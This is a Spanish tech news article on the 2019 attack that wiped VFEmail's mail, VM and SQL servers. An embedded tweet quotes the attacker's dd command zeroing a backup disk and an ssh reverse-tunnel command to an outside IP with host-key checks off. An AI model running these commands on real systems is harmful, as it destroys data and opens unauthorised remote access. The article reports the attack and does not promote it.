El poder del hackeo: un ataque acaba con una empresa y casi dos décadas de trabajo
Un proveedor de correo electrónico ha sufrido un ataque informático que ha acabado con su infraestructura y con 2 décadas de trabajo. El poder del hackeo.
12 febrero, 2019 20:56Noticias relacionadas
- Los datos de casi todos los ciudadanos de Bulgaria han sido robados
- El inventor de la contraseña en los ordenadores muere a los 93 años
- Aviso de bomba: como abras este archivo tu ordenador se llenará de datos
- El Walkie-talkie del Apple Watch permite espiar lo que otra persona dice en su iPhone por un bug
Muchos discrepan ante la informatización de la industria del trabajo. Antes sólo los errores gordos acababan con montones de trabajo (y algunos trabajadores incompetentes). Ahora, con el poder del hackeo y la seguridad en Internet, toneladas de ese trabajo pueden irse al traste por un simple error informático o alguien con unos conocimientos y una maldad enormes. Eso es lo que le ha pasado a VFEMail, que ha visto su infraestructura y sus casi 2 décadas de trabajo desaparecer.
Un ataque hacker se lleva casi 2 décadas de trabajo y una empresa por delante
Así lo anunció Rick Romero, el fundador de la empresa. VFEmail se fundó en 2001 como respuesta al virus ILOVEYOU que infectó a decenas de millones de computadoras con Windows en todo el mundo el año pasado, y tenía como objetivo ofrecer una mejor experiencia de correo electrónico al escanear los mensajes en busca de malware en el servidor.
Yes, @VFEmail is effectively gone. It will likely not return.
I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.— Havokmon (@Havokmon) 12 de febrero de 2019
El mismo Romero, en Twitter, ha dado la noticia. Destrozado, se pregunta cómo alguien ha tenido tanto interés en destruir lo que el más amaba de esta forma. Y no es para menos; este ataque se ha llevado por delante casi 20 años de trabajo y prácticamente toda la empresa al haber afectado incluso a su infraestructura.
El ataque. de hecho, ha sido muy simple y efectivo. El primer indicio de este suceso fue cuando Romero notó que los servidores estaban caídos. La cuenta de VFEmail reportó, horas después, que habían formateado todo el contenido de los discos duros de la empresa. Aunque se cazó al autor del ataque en mitad del formateo, aún no se ha dado con él.
Según Romero, el daño se extendió a la “infraestructura completa” de VFEmail, incluidos hosts de correo, hosts de máquinas virtuales y un clúster de servidores SQL. La extensión del daño, dijo, requería que el pirata informático tuviera en su poder varias contraseñas del servicio. Esa, para Romero, es la parte que más miedo da.
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N— VFEmail.net (@VFEmail) 11 de febrero de 2019
Este ataque ha provocado que no se pueda usar el servicio directamente. Aunque una página de estado hablaba de que VFEmail seguía activa, se dejó claro que los usuarios del servicio ni debían mandar correos ni debían usar sus clientes por la potencial amenaza de seguridad que implicaba dicho atacante.
Lo más crudo del tema es la motivación personal del atacante. Algunos de los ataques informáticos más grandes de han llevado a cabo por grupos de personas empecinadas en atacar a un organismo en concreto con ataques masivos o, en su defecto, por extorsionadores de criptomoneda. El que hiciera esto o bien odiaba con toda su alma al servicio o tenía algo en contra de Romero.
El peligro de una infraestructura hackeable
Hace ya unos años que vivimos un corte a nivel mundial de Internet. Una interrupción en unos servidores específicos provocaron que multitud de servicios importantísimos como Facebook o Google comenzaran a fallar. Vivimos en un mundo tan informatizado que un ataque lo suficientemente importante podría provocar el caos a nivel mundial.
No queremos sonar alarmistas, pero es así. Una empresa puede irse a pique si un hacker se las apaña bien, y aunque en Omicrono estamos absolutamente a favor de que la digitalización llegue a todo el mundo, conlleva problemas de esta clase que deberían mentalizar a las personas para afrontar este tipo de situaciones. Porque que se cayera Internet en el mundo entero podría provocar una guerra antes que un conflicto bélico real.
Por esto siempre instamos a los usuarios, empresas y sobre todo instituciones y gobiernos a que prioricen su seguridad digital. El mundo está conectado por una serie de redes muy finas que cualquiera con la suficiente fuerza podría destruir, por lo que es vital que nos protejamos y mentalicemos acerca de los asuntos tecnológicos del planeta y actuar en consecuencia.